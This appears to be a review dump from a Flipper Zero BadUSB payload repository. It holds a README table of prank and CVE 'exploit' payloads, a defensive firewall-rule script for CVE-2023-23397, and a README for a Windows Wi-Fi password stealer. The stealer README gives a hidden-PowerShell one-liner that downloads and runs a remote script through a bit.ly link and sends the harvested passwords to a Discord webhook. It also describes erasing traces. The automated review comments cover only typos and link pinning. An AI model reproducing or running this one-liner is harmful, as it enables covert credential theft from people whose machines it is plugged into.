|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)**KDE**|Prank|[Change Desktop Wallpaper](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/ChangeDesktopWallpaper_LinuxKDE)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Signal Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendSignalMessages_Windows)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Microsoft Teams Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendMessagesInTeams)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Never Gonna Give You Up](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/NeverGonnaGiveYouUp_Windows)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Telegram Messages](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendTelegramMessages_Linux)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Change The App That Will Be Runned](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/Change_The_App_That_Will_Be_Runned)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Alien Message From Computer](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/AlienMessageFromComputer)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Continuous Print In Terminal](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/ContinuousPrintInTerminal)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Wallpaper With Screenshot](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/ChangeWallpaperWithScreenshot)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Play A Song Through Spotify](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/PlayASongThroughSpotify)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Full-Screen Banner Joke](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Full-ScreenBannerJoke)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[The Mouse Moves By Itself](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/The_Mouse_Moves_By_Itself)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Try To Catch Me](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Try_To_Catch_Me)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Follow Someone On Instagram](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Follow_Someone_On_Instagram)|🟡|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Pranh(ex)](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Pranh(ex))|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/SendEmailThroughThunderbird)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Send Email Through Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/SendEmailThroughThunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Change Github Profile Settings](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Change_Github_Profile_Settings)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Play A Song With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Play_A_Song_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Call Someone With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Call_Someone_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Edit A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Edit_A_Reminder_With_An_iPhone)|🟡|
|![iOS](https://img.shields.io/badge/iOS-000000?style=for-the-badge&logo=ios&logoColor=white)|Prank|[Delete A Reminder With An iPhone](https://github.com/aleff-github/my-flipper-shits/tree/main/iOS/Prank/Delete_A_Reminder_With_An_iPhone)|🟡|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Kali Linux - This_damn_shell_doesn_t_work... so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-KALI)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Prank|[Linux - This_damn_shell_doesn_t_work... so_sad!](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Prank/This_damn_shell_doesn_t_work___so_sad!-LINUX)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Prank In The Middle - Thunderbird](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Prank_In_The_Middle_Thunderbird)|🟢|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Prank|[Spam Terminals - by bst04](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Prank/Spam_Terminals-by_bst04)|🟢|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE)|🔴|
|![Linux](https://img.shields.io/badge/Linux-FCC624?style=for-the-badge&logo=linux&logoColor=black)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/GNU-Linux/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Indicent Response|[Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966)|🔴|
|![Windows](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)|Incident Response|[Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability](https://github.com/aleff-github/my-flipper-shits/tree/main/Windows/Incident_Response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_Remote_Code_Execution_Vulnerability)|🟢|
|//|Prank|[Flipper Zero GIF](img/gif)|🟢|
## FAQs
<ul>
<li><strong>DEFINE</strong> doesn't work!
<ul>
<li>DEFINEs in FlipperZero probably doesn't work, if they give you an error just remove them by directly entering what you want in the appropriate place</li>
</ul>
</li>
<li><strong>REM</strong> errors
<ul>
<li>If you have an error on a REM line make sure it is not a blank line. In any case, REMs are comments and can be deleted so try deleting the line that gives you an error to see if it fixes the problem.</li>
</ul>
</li>
<li>In the Rick Roll video prank it's calling for a bit.ly and seems to go to a github 404 page
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/issues/3">Solution</a> - <strong>bit.ly</strong> link broken - 404 problems</li>
</ul>
</li>
<li>I dont understand how to put a .py link in a .txt can you help me please?
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/issues/6">Solution</a> - How to insert a link to an external resource and why?</li>
</ul>
</li>
<li>Why you should absolutely not use permanent links maintained by others.
<ul>
<li><a href="https://github.com/aleff-github/my-flipper-shits/pull/14">Read the discussion</a> born from a Pull Request</li>
</ul>
</li>
</ul>
## Where They Talk About This Repository
- [CVE Feed](https://cvefeed.io/vuln/detail/CVE-2023-20273)
- [CSDN(Chinese Software Developer Network)/Full Article (Special Thanks!)](https://blog.csdn.net/gitblog_00086/article/details/139082132)
- [CSDN in-List](https://blog.csdn.net/gitblog_00085/article/details/141084245)
- [Infosec Writeups](https://infosecwriteups.com/the-ultimate-guide-cheatsheet-to-flipper-zero-d4c42d79d32c)
- [SOS-Intelligence](https://sosintel.co.uk/flipper-zero-an-introduction-to-its-capabilities-and-potential-risks/)
- [Intelligence](https://sosintel.co.uk/category/opinion/)
- [Achirou](https://achirou.com/guia-de-flipper-zero-hacking-con-badusb/)
- [Awesome Open Source - The Top 23 Flipperzero Open Source Projects](https://awesomeopensource.com/projects/flipperzero)
- [Decryptology](https://dev.decryptology.net/GitHub/awesome-flipperzero#badusb)
- [Gitters/Hak5](https://giters.com/topics/hak5)
- [Christan Workshop](https://christanworkshop.com/flipperzero)
- [Twitter/HAHWUL](https://x.com/hahwul/status/1829076650681872619)
- [Popdocs](https://flipper.popdocs.net/applications/duckyscript)
## Some Boring Considerations
This is my pay after over 1 year and 3 months of work.
![](https://i.ibb.co/h2g16g3/1712950001561.jpg)
On January 4, 2023, after treating myself to the Flipper Zero for Christmas, I began publishing scripts in DuckyScript on the GitHub repository 'my-flipper-shits'.
I've always considered it normal and right to publish the source code I developed because I find it absurd to cover it with a copyright license, and for this reason, I decided to make it available under the copyleft GPLv3 license.
After a few months, I started to see that some people were staring the repository, then the first forks appeared, and finally, I decided to tidy it up a bit and make it more usable with a much nicer README.md.
Someone wrote to me on Discord, others sent me an email, but whenever they reported problems, I always tried to help them, not always succeeding, but always trying. So I added FAQs to the homepage.
After:
- 80 payloads uploaded for GNU/Linux, Windows, and iOS.
- Over 252,000 views.
- 771 Stars
- 55 Forks
- 19 watching
… this is the first completely spontaneous 'thank you' (without providing assistance) I've received in over 1 year of activity.
Activity open to anyone and making everything I did available under GPLv3, all without ever asking for a single euro. For free. My intention with these publications is to disseminate, within the limits of my knowledge, as much as I can to anyone without making any distinctions, so that knowledge can be freely and librement available to anyone.
And it is precisely for this reason that I consider this spontaneous thanks from a completely unknown person my pay.
Developing libre source code is important, and I hope this message is clear.
## Credits
<div align=center>
<h2> Aleff</h2>
<table>
<tr>
<td align="center" width="96">
<img src="https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/github.png" width="48" height="48" onclick="window.open('https://github.com/aleff-github')"/>
<br>
<p>Github</p>
</td>
<td align="center" width="96">
<img src="https://raw.githubusercontent.com/aleff-github/aleff-github/main/img/linkedin.png" width="48" height="48" onclick="window.open('https://www.linkedin.com/in/alessandro-greco-aka-aleff/')"/>
<br>
<p>LinkedIn</p>
</td>
</tr>
</table>
<ul>
<li>
GitHub: https://github.com/aleff-github
</li>
<li>
Linkedin: https://www.linkedin.com/in/alessandro-greco-aka-aleff/
</li>
</ul>
</div>
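Review bot: the Category cell is misspelled "Indicent Response" in the three rows for "Auto-Check Cisco IOS XE Backdoor..." and both "Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966" entries, while the "Defend yourself against CVE-2023-36884..." row in the same table uses "Incident Response"; anyone filtering or sorting the table by category will see two different categories. Suggest `|Indicent Response|` → `|Incident Response|` in those three rows. Two smaller wording points in the "Some Boring Considerations" section: "some people were staring the repository" should read "starring", and "freely and librement available" mixes in a French word where "freely available" is meant.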
@@ -0,0 +1,115 @@
# Defend Yourself From CVE-2023-23397
This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
**Category**: Credentials
*I decided to set Credentials as the category because of the type of CVE.*
## Index
- [Defend Yourself From CVE-2023-23397](#defend-yourself-from-cve-2023-23397)
- [Payload Description](#payload-description)
- [CVE-2023-23397 Description](#cve-2023-23397-description)
- [Summary](#summary)
- [Impacted Products](#impacted-products)
- [Technical Details](#technical-details)
- [Note](#note)
- [Dependencies](#dependencies)
- [Settings](#settings)
- [Administrative Privileges](#administrative-privileges)
- [Set the rule](#set-the-rule)
- [See the new rule](#see-the-new-rule)
- [Remove the rule](#remove-the-rule)
- [Credits](#credits)
## Payload Description
This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
Open a PowerShell, set the Firewall rule trough NetSecurity module.
![](docs/2.png)
## CVE-2023-23397 Description
### Summary
Microsoft Threat Intelligence discovered limited, targeted abuse of a vulnerability in Microsoft Outlook for Windows that allows for new technology LAN manager (NTLM) credential theft to an untrusted network, such as the Internet. Microsoft has released CVE-2023-23397 to address the critical elevation of privilege (EoP) vulnerability affecting Microsoft Outlook for Windows. We strongly recommend all customers update Microsoft Outlook for Windows to remain secure.
### Impacted Products
All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
### Technical Details
CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server on an untrusted network. No user interaction is required.
The threat actor is using a connection to the remote SMB server sends the users NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication.
**Source**: https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
## Note
Tested on:
- Windows 11 Eng
## Dependencies
* ExecutionPolicy Bypass
## Settings
In this payload, I created a new firewall rule called "CVE-2023-23397". The direction is set to "Outbound," the action is "Block" (block traffic), the protocol is "TCP," and the remote port is 445 (SMB). Next, the rule is enabled using the Enable-NetFirewallRule cmdlet by specifying the name of the previously created rule.
Remember that you must run PowerShell with administrative privileges to create and manage firewall rules.
### Administrative Privileges
- I used the Payload [Starting a PowerShell with administrator permissions in Windows 10/11](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows) by Hak5 Payloads
```
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFT_ARROW
DELAY 500
ENTER
```
### Set the rule
![](docs/1.png)
### See the new rule
![](docs/2.png)
### Remove the rule
![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
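Review bot: the "Administrative Privileges" snippet in this README writes the key as `LEFT_ARROW`, but the payload file added in this same commit (and the Hak5 payload the bullet links to) uses `LEFTARROW`; a reader copying the README block gets a key name that differs from the payload that actually runs, so the README should be kept in sync with the payload (`LEFTARROW`). Also a typo in "Payload Description": "set the Firewall rule trough NetSecurity module" → "through the NetSecurity module". The "Settings" paragraph would benefit from one sentence on scope: the rule as described blocks outbound TCP 445 to every remote address, which is broader than Microsoft's advice quoted in the payload ("block TCP 445/SMB outbound from your network"), so on a machine that uses internal file shares the reader should expect those to stop working until the rule is narrowed.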
@@ -0,0 +1,56 @@
REM ########################################################
REM # |
REM # Title : Defend Yourself From CVE-2023-23397 |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################
REM PlugAndPlay <3
REM Requirements:
REM - ExecutionPolicy Bypass
REM Impacted Products:
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
REM Mitigation:
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 500
LEFTARROW
DELAY 500
ENTER
REM Import NetSecurity module
STRING Import-Module NetSecurity
ENTER
REM Create a new firewall rule for blocking outgoing connections on port 445
STRING $rule = New-NetFirewallRule -DisplayName "CVE-2023-23397" `
ENTER
STRING -Direction Outbound `
ENTER
STRING -Action Block `
ENTER
STRING -Protocol TCP `
ENTER
STRING-RemotePort 445
ENTER
REM Enable firewall rule
STRING Enable-NetFirewallRule -Name $rule.Name
ENTER
DELAY 500
REM See your new rule
STRING Get-NetFirewallRule | Where-Object { $_.DisplayName -eq "CVE-2023-23397" }
ENTER
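Review bot: the line `STRING-RemotePort 445` is missing the space between the `STRING` command and its text, so it is not a valid DuckyScript line. Depending on the interpreter, either the script halts with an error at that line and the half-typed, backtick-continued `New-NetFirewallRule` call is never submitted (no rule is created), or the malformed line is skipped and the following `ENTER` submits the command without `-RemotePort`, creating an outbound block rule for all TCP traffic rather than just port 445. Suggest `STRING -RemotePort 445`. Two further points on the PowerShell itself: `New-NetFirewallRule` creates the rule enabled by default, so `Enable-NetFirewallRule -Name $rule.Name` is redundant (harmless, but worth a REM saying so or dropping it); and since the rule has no `-RemoteAddress` restriction it blocks SMB to internal file servers as well as to the Internet, which is wider than the "from your network" mitigation quoted in the header REMs. Consider scoping the rule with `-RemoteAddress` or documenting the side effect in the README.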
@@ -0,0 +1,69 @@
# WLAN Windows Password - BadUSB ✅
A script used to stole target WLAN Passwords.
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
**Category**: WLAN, Credentials
<div align=center>
<img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/logo-repository-2_0.gif" width="600" /><br><img src="https://github.com/aleff-github/my-flipper-shits/blob/main/img/DISCLAIMER.png" width="600" />
</div>
## Description
A script used to stole target WLAN Passwords.
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content
ENG 🇺🇸
```powershell
powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsENG | iex
```
ITA 🇮🇹
```powershell
powershell -w h -ep bypass $discord='<your_webhook_here>';irm bit.ly/WindowsWiFiPasswordsITA | iex
```
You must put your Discord webhook into the variable $discord='\<your-webhook-here>'
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
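Review bot: both one-liners fetch and execute code from a bit.ly short link (`irm bit.ly/... | iex`), so whatever the shortener resolves to at run time is what gets executed, and the user has no way to review it before plugging the device in. The repository's own FAQ in this commit already records a bit.ly 404 problem and links a discussion on why not to rely on links maintained by others, so this README should point at the raw script in this repository (ideally pinned to a commit) or at least state which file the short link resolves to. Wording: "A script used to stole target WLAN Passwords" appears twice and should read "steal"; "Windows 10,11" → "Windows 10/11"; and the placeholder is written `<your_webhook_here>` in the code blocks but `<your-webhook-here>` in the sentence below them, so pick one spelling.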
